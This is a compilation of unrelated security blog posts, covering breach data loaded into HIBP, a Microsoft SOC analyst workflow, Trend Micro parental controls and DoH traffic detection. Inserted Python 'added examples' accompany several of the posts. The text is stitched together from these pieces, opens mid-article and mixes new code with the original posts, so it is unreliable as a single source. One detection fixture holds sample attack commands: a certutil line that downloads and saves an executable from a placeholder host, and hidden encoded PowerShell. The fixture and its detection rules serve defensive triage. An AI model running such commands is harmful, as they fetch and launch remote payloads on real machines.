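The numbers quoted above (almost 8M records but "only" 2.5M unique addresses, many records with no email at all) come from the kind of loading pass any breach-processing pipeline does before a dataset can be attributed or searched. The following is an added example, not code from the original post or from HIBP: it reads a CSV with the same column layout the post describes, normalises the email field, and counts records, records without a usable email, and unique addresses. The CSV rows are constructed for illustration and contain nothing from the real file.

```python
"""Added example: load a breach-style CSV and count unique email addresses.

The column layout (name, email, country, region, locality, address, postcode,
latitude, longitude, tel, fax, website) follows the post; the rows below are
constructed and contain only example.com/.org addresses.
"""
import csv
import io
import re
from typing import Dict, Optional, Set

# Loose syntactic check. The goal is to discard blank or junk values before
# counting, not to validate RFC 5322.
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")


def normalise_email(value: str) -> Optional[str]:
    """Return a canonical lowercase address, or None if the field is empty or junk."""
    v = (value or "").strip().strip('"').lower()
    return v if EMAIL_RE.match(v) else None


def summarise(csv_text: str) -> dict:
    """Count records, records lacking an email, unique addresses and the
    largest number of records sharing one address."""
    reader = csv.DictReader(io.StringIO(csv_text))
    total = 0
    without_email = 0
    unique: Set[str] = set()
    per_email: Dict[str, int] = {}
    for row in reader:
        total += 1
        email = normalise_email(row.get("email", ""))
        if email is None:
            without_email += 1
            continue
        unique.add(email)
        per_email[email] = per_email.get(email, 0) + 1
    return {
        "records": total,
        "records_without_email": without_email,
        "unique_emails": len(unique),
        "max_records_per_email": max(per_email.values(), default=0),
    }


# Constructed sample: two listings for the same address (differing only in
# case), one record with no email and one with a junk email.
SAMPLE_CSV = """name,email,country,region,locality,address,postcode,latitude,longitude,tel,fax,website
Acme Notary,jane@example.com,US,CA,Fresno,1 Main St,93701,36.7,-119.7,555-0100,,acme.example
Acme Notary (2nd listing),JANE@Example.com,US,CA,Fresno,1 Main St,93701,36.7,-119.7,555-0100,,acme.example
Corner Cafe,,US,NY,Albany,2 Elm St,12207,42.6,-73.7,555-0101,,
Etsy Seller,seller@example.org,NO,,Oslo,,0150,59.9,10.7,,,example.org
Bad Row,not-an-email,US,TX,Austin,,78701,30.2,-97.7,,,
"""

if __name__ == "__main__":
    print(summarise(SAMPLE_CSV))
```

On a real multi-gigabyte file the same streaming loop works unchanged because DictReader never holds more than one row in memory; only the set of unique addresses grows.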

No, that address is private, and is a home address on my credit report.
As the information appears to be fake it should not be available online to the public
My email should not be associated with those other names/addresses/website that you found..
I live in Norway, don't run any businesses - other than just the tiny personal etsy shop you see linked below!

These responses speak to my point in the opening paragraph about the expectations people have about how their data is used, regardless of how visible it is online. And as for the final question about whether the data should be loaded into HIBP, the responses were a unanimous "yes" so as of now, it's searchable along with the other 9.3B records already in the system.

To ensure Factual were aware there was data circulating that was attributed to them and claiming to be a "breach", I got in touch with them and privately disclosed the incident. To their credit, they were receptive, responsible and professional in the way they responded and provided the following quote:

Factual has reviewed a data file provided by Troy Hunt and determined that the file contains publicly available information about businesses and other points of interest that Factual makes available on its website and to customers. The company does not believe the information was obtained from a source other than its public website.

The data includes business names, locations, website addresses, hours of operation, and contact information that the businesses themselves have made public, such as on their websites, in directories, and on social media. It is similar to data available from other public sources such as yellow pages data and mapping apps on mobile phones.

Those interested in correcting business information that may be personal data under GDPR or other applicable privacy law are encouraged to reference our privacy policy for more information:

We appreciate Mr. Hunt’s efforts to notify us and his assistance with information to facilitate our investigation.

The last thing I'll leave you with is a tweet from earlier this month which is relevant to the Factual situation. Jeremiah poses a really interesting question and the responses make for some good reading about what's changed culturally:

CISO series: Lessons learned from the Microsoft SOC—Part 3b: A day in the life

The Lessons learned from the Microsoft SOC blog series is designed to share our approach and experience with security operations center (SOC) operations. We share strategies and learnings from our SOC, which protects Microsoft, and our Detection and Response Team (DART), who helps our customers address security incidents. For a visual depiction of our SOC philosophy, download our Minutes Matter poster.

For the next two installments in the series, we’ll take you on a virtual shadow session of a SOC analyst, so you can see how we use security technology. You’ll get to virtually experience a day in the life of these professionals and see how Microsoft security tools support the processes and metrics we discussed earlier. We’ll primarily focus on the experience of the Investigation team (Tier 2) as the Triage team (Tier 1) is a streamlined subset of this process. Threat hunting will be covered separately.


General impressions

Newcomers to the facility often remark on how calm and quiet our SOC physical space is. It looks and sounds like a “normal” office with people going about their job in a calm professional manner. This is in sharp contrast to the dramatic moments in TV shows that use operations centers to build tension/drama in a noisy space.

Nature doesn’t have edges

We have learned that the real world is often “messy” and unpredictable, and the SOC tends to reflect that reality. What comes into the SOC doesn’t always fit into the nice neat boxes, but a lot of it follows predictable patterns that have been forged into standard processes, automation, and (in many cases) features of Microsoft tooling.

Routine front door incidents

The most common attack patterns we see are phishing and stolen credentials attacks (or minor variations on them):

  • Phishing email → Host infection → Identity pivot
  • Stolen credentials → Identity pivot → Host infection

While these aren’t the only ways attackers gain access to organizations, they’re the most prevalent methods mastered by most attackers. Just as martial artists start by mastering basic common blocks, punches, and kicks, SOC analysts and teams must build a strong foundation by learning to respond rapidly to these common attack methods.

As we mentioned earlier in the series, it has been over two years since network-based detection was the primary method for detecting an attack. We attribute this primarily to investments that improved our ability to rapidly remediate attacks early with host, email and identity detections. There are also fundamental challenges with network-based detections: they are noisy and carry little native context for separating true positives from false positives.

Analyst investigation process

Once an analyst settles into the analyst pod on the watch floor for their shift, they start checking the queue of our case management system for incidents (not unlike a phone support or help desk analyst would).

While anything might show up in the queue, the process for investigating common front door incidents includes:

  1. Alert appears in the queue—After a threat detection tool detects a likely attack, an incident is automatically created in our case management system. The Mean Time to Acknowledge (MTTA) measurement of SOC responsiveness begins with this timestamp. See Part 1: Organization for more information on key SOC metrics.

Basic threat hunting helps keep a queue clean and tidy

Require a 90 percent true positive rate for alert sources (e.g., detection tools and types) before allowing them to generate incidents in the analyst queue. This quality requirement reduces the volume of false positive alerts, which can lead to frustration and wasted time. To implement, you’ll need to measure and refine the quality of alert sources and create a basic threat hunting process. A basic threat hunting process leverages experienced analysts to comb through alert sources that don’t meet this quality bar to identify interesting alerts that are worth investigating. This review (without requiring full investigation of each one) helps ensure that real incident detections are not lost in the high volume of noisy alerts. It can be a simple part time process, but it does require skilled analysts that can apply their experience to the task.

  2. Own and orient—The analyst on shift begins by taking ownership of the case and reading through the information available in the case management tool. The timestamp for this is the end of the MTTA responsiveness measurement and begins the Mean Time to Remediate (MTTR) measurement.

Experience matters

A SOC is dependent on the knowledge, skills, and expertise of the analysts on the team. The attack operators and malware authors you defend against are often adaptable and skilled humans, so no prescriptive textbook or playbook on response will stay current for very long. We work hard to take good care of our people—giving them time to decompress and learn, recruiting them from diverse backgrounds that can bring fresh perspectives, and creating a career path and shadowing programs that encourage them to learn and grow.

  3. Check out the host—Typically, the first priority is to identify affected endpoints so analysts can rapidly get deep insight. Our SOC relies on the Endpoint Detection and Response (EDR) functionality in Microsoft Defender Advanced Threat Protection (ATP) for this.

Why endpoint is important

Our analysts have a strong preference to start with the endpoint because:

  • Endpoints are involved in most attacks—Malware on an endpoint represents the sole delivery vehicle of most commodity attacks, and most attack operators still rely on malware on at least one endpoint to achieve their objective. We’ve also found the EDR capabilities detect advanced attackers that are “living off the land” (using tools deployed by the enterprise to navigate). The EDR functionality in Microsoft Defender ATP provides visibility into normal behavior that helps detect unusual command lines and process creation events.
  • Endpoint offers powerful insights—Malware and its behavior (whether automated or manual actions) on the endpoint often provides rich detailed insight into the attacker’s identity, skills, capabilities, and intentions, so it’s a key element that our analysts always check for.

Identifying the endpoints affected by this incident is easy for alerts raised by the Microsoft Defender ATP EDR, but may take a few pivots on an email or identity sourced alert, which makes integration between these tools crucial.
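The "living off the land" detection described above comes down to two things: knowing what parent/child process pairs and command lines are normal in the environment, and a handful of rules for the patterns attackers reuse. The following is an added example, not code from the original post and not Microsoft Defender ATP's logic: a small triage pass over constructed process-creation events that flags Office applications spawning a shell, encoded or hidden-window PowerShell, certutil used as a downloader, and any parent/child pair never seen in a constructed baseline. The rule names, hosts, users and events are all assumptions made up for the illustration.

```python
"""Added example: process-creation triage for living-off-the-land activity.

BASELINE_EVENTS stands in for a period of known-good telemetry and NEW_EVENTS
for the events under review. Both are constructed; the rules are generic
heuristics rather than any product's detections.
"""
import re
from collections import Counter
from typing import Dict, List, Tuple

# Constructed baseline as (parent, child, command line); repeated so that these
# pairs count as common.
BASELINE_EVENTS = [
    ("explorer.exe", "outlook.exe", "outlook.exe"),
    ("explorer.exe", "winword.exe", "winword.exe /n"),
    ("services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
    ("explorer.exe", "cmd.exe", "cmd.exe"),
    ("cmd.exe", "ipconfig.exe", "ipconfig /all"),
] * 20

# Constructed events under review. 203.0.113.5 is a documentation address.
NEW_EVENTS = [
    {"host": "ws01", "user": "jdoe", "parent": "winword.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c powershell -nop -w hidden -enc SQBFAFgA"},
    {"host": "ws01", "user": "jdoe", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell -nop -w hidden -enc SQBFAFgA"},
    {"host": "ws02", "user": "asmith", "parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe"},
    {"host": "ws03", "user": "svc_backup", "parent": "cmd.exe", "image": "certutil.exe",
     "cmdline": "certutil -urlcache -split -f http://203.0.113.5/a.txt a.exe"},
    {"host": "ws02", "user": "asmith", "parent": "cmd.exe", "image": "ipconfig.exe",
     "cmdline": "ipconfig /all"},
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line patterns, checked in this order.
SUSPICIOUS_CMDLINE = [
    ("encoded_powershell", re.compile(r"powershell.*\s-(e|enc|encodedcommand)\s", re.I)),
    ("certutil_download", re.compile(r"certutil(\.exe)?\s.*-urlcache", re.I)),
    ("hidden_window", re.compile(r"\s-w(indowstyle)?\s+hidden", re.I)),
]


def build_baseline(events) -> Counter:
    """Count how often each (parent, child) pair occurs in known-good telemetry."""
    return Counter((p.lower(), c.lower()) for p, c, _ in events)


def triage(event: dict, baseline: Counter) -> List[str]:
    """Return the list of reasons this event deserves analyst attention (empty if none)."""
    reasons = []
    parent, image = event["parent"].lower(), event["image"].lower()
    if parent in OFFICE and image in SHELLS:
        reasons.append("office_spawns_shell")
    for name, rx in SUSPICIOUS_CMDLINE:
        if rx.search(event["cmdline"]):
            reasons.append(name)
    # Rarity against the baseline catches tooling we have no rule for yet.
    if (parent, image) not in baseline:
        reasons.append("unseen_parent_child_pair")
    return reasons


def run(events, baseline_events=BASELINE_EVENTS) -> List[Tuple[str, str, List[str]]]:
    baseline = build_baseline(baseline_events)
    return [(e["host"], e["image"], triage(e, baseline)) for e in events]


if __name__ == "__main__":
    for host, image, reasons in run(NEW_EVENTS):
        print(host, image, reasons or "ok")
```

The rarity check is what gives the rules their reach: the certutil event would still be flagged by the baseline alone even if the download rule were missing, which is the "visibility into normal behavior" point made above.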

  4. Scope out and fill in the timeline—The analyst then builds a full picture and timeline of the related chain of events that led to the alert (which may be an adversary's attack operation or a false positive) by following leads from the first host alert. The analyst travels along the timeline:
  • Backward in time—Track backward to identify the entry point in the environment.
  • Forward in time—Follow leads to any devices/assets an attacker may have accessed (or attempted to access).

Our analysts typically build this picture using the MITRE ATT&CK™ model (though some also adhere to the classic Lockheed Martin Cyber Kill Chain®).
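Steps 1 and 2 above define the two SOC metrics from case timestamps (MTTA runs from incident creation to the analyst taking ownership; MTTR runs from ownership to remediation), and the "Basic threat hunting" sidebar sets a 90 percent true-positive bar that an alert source must clear before it may feed the analyst queue. The following is an added example, not code from the original post or from any case management product: it computes both metrics from a constructed case export and decides per alert source whether it clears the bar, with cases from sources below it routed to the hunting review instead of the queue. The field names and source labels are assumptions about what such an export would contain.

```python
"""Added example: MTTA/MTTR and the true-positive gate on alert sources.

CASES is a constructed case export. "tp" is the analyst's final verdict
(True = real incident, False = false positive); a false positive is closed
rather than remediated, so it contributes to MTTA but not MTTR.
"""
from datetime import datetime
from statistics import mean
from typing import Dict, List

CASES = [
    {"id": 1,  "source": "edr",         "created": "2019-12-02T08:00:00", "acknowledged": "2019-12-02T08:04:00", "closed": "2019-12-02T09:04:00", "tp": True},
    {"id": 2,  "source": "edr",         "created": "2019-12-02T10:30:00", "acknowledged": "2019-12-02T10:31:00", "closed": "2019-12-02T10:51:00", "tp": True},
    {"id": 3,  "source": "edr",         "created": "2019-12-02T13:00:00", "acknowledged": "2019-12-02T13:02:00", "closed": "2019-12-02T13:32:00", "tp": True},
    {"id": 4,  "source": "email",       "created": "2019-12-02T08:20:00", "acknowledged": "2019-12-02T08:30:00", "closed": "2019-12-02T08:50:00", "tp": True},
    {"id": 5,  "source": "email",       "created": "2019-12-02T09:00:00", "acknowledged": "2019-12-02T09:05:00", "closed": "2019-12-02T09:20:00", "tp": False},
    {"id": 6,  "source": "email",       "created": "2019-12-02T14:00:00", "acknowledged": "2019-12-02T14:03:00", "closed": "2019-12-02T14:33:00", "tp": True},
    {"id": 7,  "source": "network_ids", "created": "2019-12-02T07:00:00", "acknowledged": "2019-12-02T07:20:00", "closed": "2019-12-02T07:25:00", "tp": False},
    {"id": 8,  "source": "network_ids", "created": "2019-12-02T07:30:00", "acknowledged": "2019-12-02T07:50:00", "closed": "2019-12-02T07:55:00", "tp": False},
    {"id": 9,  "source": "network_ids", "created": "2019-12-02T09:30:00", "acknowledged": "2019-12-02T09:40:00", "closed": "2019-12-02T10:00:00", "tp": True},
    {"id": 10, "source": "network_ids", "created": "2019-12-02T12:00:00", "acknowledged": "2019-12-02T12:15:00", "closed": "2019-12-02T12:20:00", "tp": False},
]

_FMT = "%Y-%m-%dT%H:%M:%S"


def _minutes(start: str, end: str) -> float:
    return (datetime.strptime(end, _FMT) - datetime.strptime(start, _FMT)).total_seconds() / 60


def mtta(cases: List[dict]) -> float:
    """Mean Time to Acknowledge: creation -> ownership, over every case."""
    return mean(_minutes(c["created"], c["acknowledged"]) for c in cases)


def mttr(cases: List[dict]) -> float:
    """Mean Time to Remediate: ownership -> remediation, true positives only."""
    return mean(_minutes(c["acknowledged"], c["closed"]) for c in cases if c["tp"])


def source_quality(cases: List[dict], threshold: float = 0.9) -> Dict[str, dict]:
    """Per alert source: observed true-positive rate and whether it may feed the queue."""
    verdicts: Dict[str, List[bool]] = {}
    for c in cases:
        verdicts.setdefault(c["source"], []).append(c["tp"])
    return {
        src: {"tp_rate": round(sum(v) / len(v), 3),
              "queue_eligible": sum(v) / len(v) >= threshold}
        for src, v in verdicts.items()
    }


def hunting_backlog(cases: List[dict], threshold: float = 0.9) -> List[int]:
    """Case ids from sources below the bar: reviewed by a hunter, not queued for analysts."""
    quality = source_quality(cases, threshold)
    return [c["id"] for c in cases if not quality[c["source"]]["queue_eligible"]]


if __name__ == "__main__":
    print("MTTA (min):", mtta(CASES))
    print("MTTR (min):", mttr(CASES))
    for src, q in source_quality(CASES).items():
        print(src, q)
    print("hunting backlog:", hunting_backlog(CASES))
```

The verdict-based rate lags by however long investigations take, so in practice the gate is recomputed on a rolling window; the point is that a source with a poor rate is demoted to the hunting review rather than silently switched off.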

True or false? Art or science?

The process of investigation is partly a science and partly an art. The analyst is ultimately building a storyline of what happened to determine whether this chain of events is the result of a malicious actor (often attempting to mask their actions/nature), a normal business/technical process, an innocent mistake, or something else.

This investigation is an iterative process. Analysts identify potential leads based on the information in the original report, follow those leads, and evaluate whether the results contribute to the investigation.

Analysts often contact users to establish whether they performed an anomalous action intentionally or accidentally, or whether it was not done by them at all.

Running down the leads with automation

Much like analyzing physical evidence in a criminal investigation, cybersecurity investigations involve iteratively digging through potential evidence, which can be tedious work. Another parallel between cybersecurity and traditional forensic investigations is that popular TV and movie depictions are often much more exciting and faster than the real world.

One significant advantage of investigating cyberattacks is that the relevant data is already electronic, making it easier to automate the investigation. For many incidents, our SOC takes advantage of security orchestration, automation, and response (SOAR) technology to automate investigation (and remediation) of routine incidents. Our SOC relies heavily on the AutoIR functionality in Microsoft Threat Protection tools like Microsoft Defender ATP and Office 365 ATP to reduce analyst workload. In our current configuration, some remediations are fully automatic and some are semi-automatic (analysts review the automated investigation and the proposed remediation before approving its execution).

Document, document, document

As the analyst builds this understanding, they must capture a complete record with their conclusions and reasoning/evidence for future use (case reviews, analyst self-education, re-opening cases that are later linked to active attacks, etc.).

As our analyst develops information on an incident, they capture the common, most relevant details quickly into the case such as:

  • Alert info: Alert links and Alert timeline
  • Machine info: Name and ID
  • User info
  • Event info
  • Detection source
  • Download source
  • File creation info
  • Process creation
  • Installation/Persistence method(s)
  • Network communication
  • Dropped files

Fusion and integration avoid wasting analyst time

Each minute an analyst wastes on manual effort is another minute the attacker has to spread, infect, and do damage during an attack operation. Repetitive manual activity also creates analyst toil, increases frustration, and can drive interest in finding a new job or career.

We learned that several technologies are key to reducing toil (in addition to automation):

  • Fusion—Adversary attack operations frequently trip multiple alerts in multiple tools, and these must be correlated and linked to avoid duplication of effort. Our SOC has found significant value from technologies that automatically find and fuse these alerts together into a single incident. Azure Security Center and Microsoft Threat Protection include these natively.
  • Integration—Few things are more frustrating and time consuming than having to switch consoles and tools to follow a lead (a.k.a., swivel chair analytics). Switching consoles interrupts the analyst's thought process and often requires manual tasks to copy/paste information between tools to continue their work. Our analysts are extremely appreciative of the work our engineering teams have done to bring threat intelligence natively into Microsoft's threat detection tools and link together the consoles for Microsoft Defender ATP, Office 365 ATP, and Azure ATP. They're also looking forward to (and starting to test) the Microsoft Threat Protection Console and Azure Sentinel updates that will continue to reduce the swivel chair analytics.
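To make the fusion idea concrete, here is an added example (not Microsoft's code, and not how their products implement it) that links alerts from several hypothetical tools into one incident whenever they share an entity such as a host, user or file hash, and then collects the entities of a fused incident into the kind of case record described above. The tool names, entity types and alert values are constructed.

```python
"""Alert fusion: group alerts from several tools into incidents when they share
an entity (host, user, file hash, destination). Added example, not Microsoft's code."""
from collections import defaultdict

# Constructed sample alerts as three hypothetical tools might emit them.
ALERTS = [
    {"id": "A1", "source": "email-gateway", "entities": {"user": "alice", "sha256": "h-doc1"}},
    {"id": "A2", "source": "endpoint", "entities": {"host": "WS-17", "user": "alice", "sha256": "h-doc1"}},
    {"id": "A3", "source": "endpoint", "entities": {"host": "WS-17", "sha256": "h-payload"}},
    {"id": "A4", "source": "network", "entities": {"host": "WS-17", "dst": "198.51.100.7"}},
    {"id": "A5", "source": "endpoint", "entities": {"host": "WS-42", "user": "bob"}},
]


def fuse_alerts(alerts):
    """Return incidents as lists of alert ids, linked transitively by any shared
    (entity type, value) pair, using a small union-find over alert ids."""
    parent = {a["id"]: a["id"] for a in alerts}

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path halving keeps lookups short
            x = parent[x]
        return x

    def union(a, b):
        ra, rb = find(a), find(b)
        if ra != rb:
            parent[rb] = ra

    first_seen = {}  # (entity type, value) -> id of the first alert carrying it
    for a in alerts:
        for etype, value in a["entities"].items():
            key = (etype, value)
            if key in first_seen:
                union(first_seen[key], a["id"])
            else:
                first_seen[key] = a["id"]

    groups = defaultdict(list)
    for a in alerts:  # alerts keep their original order inside each incident
        groups[find(a["id"])].append(a["id"])
    return sorted(groups.values(), key=lambda g: g[0])


def incident_summary(alerts, incident_ids):
    """Collect the entities and alert sources of one fused incident by type,
    ready to be pasted into the case record (hosts, users, hashes, network)."""
    by_id = {a["id"]: a for a in alerts}
    summary = defaultdict(set)
    for aid in incident_ids:
        for etype, value in by_id[aid]["entities"].items():
            summary[etype].add(value)
    summary["sources"] = {by_id[aid]["source"] for aid in incident_ids}
    return {k: sorted(v) for k, v in summary.items()}


if __name__ == "__main__":
    for incident in fuse_alerts(ALERTS):
        print(incident, incident_summary(ALERTS, incident))
```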

Stay tuned for the next segment in the series, where we’ll conclude our investigation, remediate the incident, and take part in some continuous improvement activities.

Learn more

In the meantime, bookmark the Security blog to keep up with our expert coverage on security matters and follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

To learn more about SOCs, read previous posts in the Lessons learned from the Microsoft SOC series, including:

Watch the CISO Spotlight Series: Passwordless: What’s It Worth.

Also, see our full CISO series and download our Minutes Matter poster for a visual depiction of our SOC philosophy.

The post CISO series: Lessons learned from the Microsoft SOC—Part 3b: A day in the life appeared first on Microsoft Security.

Parental Controls – Trend Micro Home Network Security has got you covered

We continue our three-part series on protecting your home and family. If you missed our first part, you can find it here

Are your kids at that formative age when they’re beginning to use mobile devices? How about at that inquisitive age when they start to discover the wonders of the Internet? Or that age when they tend to be more carefree and self-indulgent?

The Internet and the digital devices our children use are valuable tools when used the right way. They give them access to a wide range of information, pave the way to explore worthwhile ideas, and keep them socially connected with family, relatives and friends. That said, though there are big advantages to kids’ use of the Internet, there are dangers as well. Part 2 of our 3-part series on home network security discusses those dangers to your children and what you can do to protect them, leveraging Trend Micro Home Network Security’s Parental Controls to help you do so.

Internet Access Threats are Real

Gone are the days when simple malware was the focal point of internet safety. Nowadays children have so many devices giving them access to the internet that the unknown and dangerous situations they can encounter have multiplied. As a parent, the challenges include the following:

  • Your children can come across unwanted or explicit content (such as porn), whether intentionally or unintentionally.
  • Your children can become victims of cyber bullies or internet predators through messaging apps they use or websites they visit.
  • Your kids could be concealing their delinquent online activities from you.
  • There also may be apps your kids are using that you don’t approve of. Conversely, there may be apps you approve, but your kids are spending too much time on them.
  • Your youngsters could be spending too much time on their digital devices instead of studying or doing other productive activities.

Parental Controls: Your Silent Partner

Finding the right balance between parenting and controlling a child's use or possible misuse of the internet is tricky. Here's where Trend Micro Home Network Security's (HNS) Parental Controls can come in. In addition to protecting your home network from security risks and attacks, HNS also provides a robust and flexible parental control system to keep internet usage safe for your children. Controls include:

  • Web Access Control and Monitoring, which gives parents the ability to allot Daily Time Quotas as well as to implement a Customizable Schedule for your child’s screen time. The controls include the means to Pause Internet Access by each Family Member’s Profile; and they also provide general Online Connectivity Monitoring for observing family members’ internet usage.
  • Website and Content Filtering blocks inappropriate websites and content. It also enables parents to turn on Google Safe Search and YouTube Restricted Mode.
  • App Controls manages YouTube Pause and Time Limits. In addition, App Detection alerts you if your children are detected using potentially inappropriate apps.

Parental Controls that Work for You

Protecting your family members online starts with Adding a Profile.

You can add a new Profile for each Family Member and assign to them the devices they control. To do this, you can just simply tap Family in the Command Menu and choose the family member by tapping Add Someone. This will let you provide the Profile Name and Profile Picture as well as Assign Devices to the person by tapping the device(s) in the Unassigned panel. The devices you select will then be automatically moved into the ownership panel for that person. Tap Done and you’ll be presented with the Settings screen for that child’s Profile, where you can configure Parental Controls as you see fit.

Website Filtering

Next, let’s proceed with the most common component: Website Filtering.

  • To set this up, tap Set Up Now for Filtering to block inappropriate websites and content for this family member.
  • Once the Filtering screen appears, you can toggle on Get Notifications for this family member when selected websites are visited, and Block to block selected websites for this family member’s profile.
  • You can also tap the appropriate pre-configured setting for the Age Level for this particular profile. You can choose from Child, Pre-Teen, and Teen; or tap Custom to manually select categories and subcategories to block. Filtered Categories include: Adult or Sexual (e.g. Pornography), Communication or Media (e.g. Social Networking), Controversial (e.g. Violence, Hate, Racism) and Shopping and Entertainment (e.g. Games, Gambling).
  • There may be instances where you may want to set exceptions to allow specific websites to be accessed or blocked. To do so, tap Set Exceptions and then add the website URL to either the Allowed List or Denied List.

Content Filtering

Moving on, you can also set up Content Filtering.

  • Setting up Content Filtering is quite straightforward. For example, you can toggle Turn On Google Safe Search to filter Google search results on your child’s phone, tablet or computer within your home network.
  • Likewise, all you need to do to restrict mature, inappropriate and offensive content on YouTube search results on your child’s devices is to toggle Turn On YouTube Restricted Mode.

App Controls

To continue, there are apps that parents disapprove of, but there are always those instances when the children try to use them anyway against their parent’s wishes. That’s when you can choose to be informed of the Inappropriate Apps Used by your children.

  • You can achieve this by tapping Set Up Now under Inappropriate App Used and then enabling Get Notifications.
  • You can then choose from the App Categories such as Games, Adult, Social Network or Chat, Shopping or Advertisement, Media/Streaming, Dating and VPN, which will send an alert once those selected apps are used by your kids on their respective devices.

Time Limits and Notifications

Even when you try to teach your kids about being responsible about their online time, it’s easier said than done. Thus, parents or guardians can schedule the hours of screen time their children are allowed each day, along with the hours when screen time is available. HNS’s Parental Controls provide both of these features and more.

  • To set up Time Limits, just tap Set Up Now to bring up Add First Rule. You can select the days for this rule and the number of hours per day that your child can use the internet.
  • You can indicate the Internet Time Limit and Time on YouTube by scrolling back and forth to see the limits available, then tap the total time per day you want to allow.
  • Once you set the limits, you may want to toggle Get Notifications to tip you off when your child reaches the limit.
  • Next, you'll set the time period when your child can use the Internet by tapping the From and To fields, and moving the Time Wheelbar accordingly for the Beginning and Ending.
  • You can opt to be informed by selecting Get Notifications when your child attempts to use the internet outside the allowed time period, as well as Block Internet Access for the child when they do.
  • Before tapping Done to finalize the rule(s), the Rule Complete screen shows a summary of the rule you’ve set, providing a clock to show the Allowed Time, the Days for which the rule is set, the Hours of Internet allowed, including any time allowed for YouTube viewing, and the Times

Connection Alerts

Last but not least, since it’s tough to keep monitoring when your child is online, tapping Trend Micro HNS’ Connection Alert to toggle it on makes it easier for parents to get notifications when their kid’s digital devices connect to the home network during a specified time period.

In the end, Trend Micro Home Network Security's Parental Controls can assist parents in dealing with the online safety challenges all children are exposed to in the 21st century. HNS' flexible and intuitive feature set, comprising Filtering, Inappropriate App Used, Time Limits and Connection Alerts, supports every parent or guardian's goal of ensuring a safe and secure internet experience for their kids. Coupled with kind face-to-face conversations, where you let your children know your care for them extends to how they use the Internet, HNS becomes your silent partner in ensuring your family's safety.

For more information, go to Trend Micro Home Network Security.

The post Parental Controls – Trend Micro Home Network Security has got you covered appeared first on .

Researcher: Identifying non-decryption DNS-Over-HTTPS traffic

Apparently, without even decrypting it, DNS-over-HTTPS (DoH) traffic can be detected, a security researcher has discovered.

The aim of the DoH protocol is to improve overall Internet security by submitting DNS queries and receiving DNS responses over HTTP protected by TLS.

DoH seeks to counter both passive monitoring and aggressive redirection attacks by encrypting DNS data and allowing authentication of the resolver. DNS over TLS (DoT) provides a different set of protections.

One could actually identify DoH traffic by analyzing both traffic to and from a site, according to Johannes Ullrich, Dean of Research at the SANS Technology Institute.

For his project, the researcher used Firefox, since Mozilla makes it easy to enable DoH (Mozilla has been working on DoH since 2017) and because the browser can write its TLS master keys to a file named by the SSLKEYLOGFILE environment variable, which allows the captured traffic to be decrypted afterwards (Chrome also supports this).

Firefox 71 on Mac was used for the experiment with Cloudflare as a resolver — Mozilla has also recently added NextDNS to its Trusted Recursive Resolver (TRR) program.

Although not definitive, particularly since only a few minutes of traffic was obtained, the test showed that DoH traffic is actually easy to identify.

The researcher launched Firefox after starting tcpdump, and navigated to a few dozen sites. The packet capture file was loaded into Wireshark 3.1.0, which fully supports DoH and HTTP/2 (Firefox requires HTTP/2 for DoH).

“I identified the DoH traffic using the simple display filter ‘dns and tls.’ The entire DoH traffic was confined to a single connection between my host and (2606:4700::6810:f8f9),” the researcher notes.

In this particular case, the traffic could be identified by the resolver's hostname, but a user could run their own DoH server, which hostname-based identification would not catch.

Further analysis showed that the traffic can also be identified by the sizes of the DoH payloads. DNS queries and replies are usually no larger than a few hundred bytes, whereas ordinary HTTPS connections tend to carry packets that fill the maximum transmission unit (MTU), Ullrich explains.

“In short: if you see long-lasting TLS connections, with payloads that rarely exceed a kByte, you probably got a DoH connection,” the researcher notes.

Some of the characteristics found during the trial may be specific to this implementation (Firefox with Cloudflare as the resolver), and more definitive findings would require additional testing, Ullrich also states.
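The size-and-duration heuristic above can be applied to connection statistics without any decryption. The following added example (not the researcher's code) groups constructed packet records per TLS connection and flags long-lived connections whose payloads almost never exceed a kilobyte; the addresses, thresholds and packet sizes are assumptions, and a real detector would key connections on the full 4-tuple and tune the thresholds against local traffic.

```python
"""Heuristic identification of DoH connections from TLS traffic statistics only
(no decryption). Added example of the heuristic described above; constructed data."""
from collections import defaultdict

# Constructed packet records: (time_s, client, server, server_port, tls_payload_bytes).
PACKETS = []
# Connection 1: long-lived, a small record every few seconds (DoH-like).
for i in range(60):
    PACKETS.append((i * 3.0, "10.0.0.5", "203.0.113.10", 443, 90 + (i % 7) * 40))
# Connection 2: a short page load whose payloads fill the MTU (ordinary HTTPS).
for i in range(25):
    PACKETS.append((100.0 + i * 0.01, "10.0.0.5", "203.0.113.20", 443, 1400 if i % 3 else 300))
# Connection 3: long-lived video stream with large payloads (long-lived, but not DoH).
for i in range(200):
    PACKETS.append((i * 1.0, "10.0.0.5", "203.0.113.30", 443, 1400))


def connection_stats(packets):
    """Aggregate packets per (client, server, port): duration, count and the share
    of payloads at or below 1 KiB, which is what distinguishes DoH in the heuristic."""
    conns = defaultdict(list)
    for t, src, dst, port, size in packets:
        conns[(src, dst, port)].append((t, size))
    stats = {}
    for key, recs in conns.items():
        times = [t for t, _ in recs]
        sizes = [s for _, s in recs]
        stats[key] = {
            "duration_s": max(times) - min(times),
            "packets": len(sizes),
            "small_ratio": sum(1 for s in sizes if s <= 1024) / len(sizes),
            "max_payload": max(sizes),
        }
    return stats


def likely_doh(stat, min_duration_s=60.0, min_packets=20, min_small_ratio=0.95):
    """Long-lasting connection, enough records to judge, and almost all of them
    under a kilobyte. Thresholds are assumptions to be tuned per environment."""
    return (stat["duration_s"] >= min_duration_s
            and stat["packets"] >= min_packets
            and stat["small_ratio"] >= min_small_ratio)


def find_doh_connections(packets):
    """Return the sorted list of connection keys the heuristic flags as DoH."""
    return sorted(key for key, st in connection_stats(packets).items() if likely_doh(st))


if __name__ == "__main__":
    for key, st in connection_stats(PACKETS).items():
        print(key, st, "DoH?" , likely_doh(st))
```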


The post Researcher: Identifying non-decryption DNS-Over-HTTPS traffic appeared first on .

The Best Templates for Posting Cybersecurity Jobs

